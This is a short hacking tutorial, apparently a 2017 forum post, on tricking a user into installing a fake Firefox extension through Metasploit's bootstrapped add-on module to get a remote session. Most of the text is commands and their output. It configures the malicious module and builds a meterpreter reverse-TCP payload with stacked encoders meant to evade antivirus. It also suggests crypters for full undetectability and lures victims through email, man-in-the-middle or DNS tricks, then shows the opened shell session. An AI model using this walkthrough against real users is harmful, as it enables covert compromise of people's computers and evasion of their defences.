Compromising a Computer Using a Fake Firefox Extension

Sep 11, 2017 10:05 PM
636407380930748357.jpg

Using social engineering we will try to have a user install a fake Firefox extension to get a remote session on their system.

Through the Metasploit module firefoxxpibootstrapped_addon , we will create an .xpi file that will be presented to the victim inside a web page. When the user visits it, your Firefox browser will ask you if you trust and want to install the extension. If the user clicks 'install' will execute the payload with the permissions of the user.

We will do a simple demonstration against a Windows XP SP3.

Step 1: Open the Console of Metasploit (Msfconsole), Update and Load the Corresponding Module:

Code:

msf > use exploit/multi/browser/firefoxxpibootstrapped_addon

msf exploit(firefoxxpibootstrapped_addon) >

Step 2: Now Proceed to Configure the Addon:

Code:

msf exploit(firefoxxpibootstrapped_addon) > set addonname falso

addonname => falso

msf exploit(firefoxxpibootstrapped_addon) > set SRVHOST 192.168.1.35

SRVHOST => 192.168.1.35

msf exploit(firefoxxpibootstrapped_addon) > set SRVPORT 80

SRVPORT => 80

msf exploit(firefoxxpibootstrapped_addon) > set URIPATH fakeEx

URIPATH => fakeEx

msf exploit(firefoxxpibootstrapped_addon) > set LHOST 192.168.1.35

LHOST => 192.168.1.35

Step 3: Next We Prepare Our Payload to Try That the AV Does Not Detect It. First with Msfvenom:

Code:

D:\metasploit4>ruby\bin\ruby.exe msf3\msfvenom --payload windows/meterpreter/reversetcp --format exe --encoder x86/shikataganai --iterations 10 -e x86/countdown -i 3 -e x86/call4dwordxor -i 5 -e x86/jmpcall_additive -i 5 -f c LHOST=192.168.1.35 > trojan.exe

* x86/jmpcalladditive succeeded with size 321 (iteration=1)

* x86/jmpcalladditive succeeded with size 353 (iteration=2)

* x86/jmpcalladditive succeeded with size 385 (iteration=3)

* x86/jmpcalladditive succeeded with size 417 (iteration=4)

* x86/jmpcalladditive succeeded with size 449 (iteration=5)

Then You Will Have to Use Another Crypter if You Want Your Payload to Be as FuD as Possible ... So It Does Not Cost Anything to Modify a Stub and Use Some of Those So Sexy on the Net ;)



Then We Load the Payload for Our Module:

msf exploit(firefoxxpibootstrapped_addon) > set PAYLOADFILE d:\\metasploit4\\trojan.exe

PAYLOADFILE => d:\metasploit4\trojan.exe

payload => windows/meterpreter/reverse_tcp

And we launched the exploit:

Code:

msf exploit(firefoxxpibootstrapped_addon) > exploit

* Exploit running as background job.

msf exploit(firefoxxpibootstrapped_addon) >

* Started reverse handler on 192.168.1.35:4444

* Using URL: http://192.168.1.35:80/fakeEx

* Server started.

Step 4: Now That We Have Everything Running We Only Need the User to Visit Our URL (Mail, MITM, DNS, ...) And Install the Fake Firefox Extension

Code: Select

msf exploit(firefoxxpibootstrapped_addon) >

* 192.168.1.35 firefoxxpibootstrapped_addon - Sending xpi and waiting for user to click 'accept'...

636407389614515576.jpg

If you fall into the trap, we will get the remote session:

Code:

* Sending stage (752128 bytes) to 192.168.1.35

* Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.35:15831) at 2012-05-28 19:11:57 +0200

msf exploit(firefoxxpibootstrapped_addon) > sessions -i

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------

1 meterpreter x86/win32 192.168.1.35:4444 -> 192.168.1.35:15831 (192.168.1.35)

grreetings ......

Comments

No Comments Exist

Be the first, drop a comment!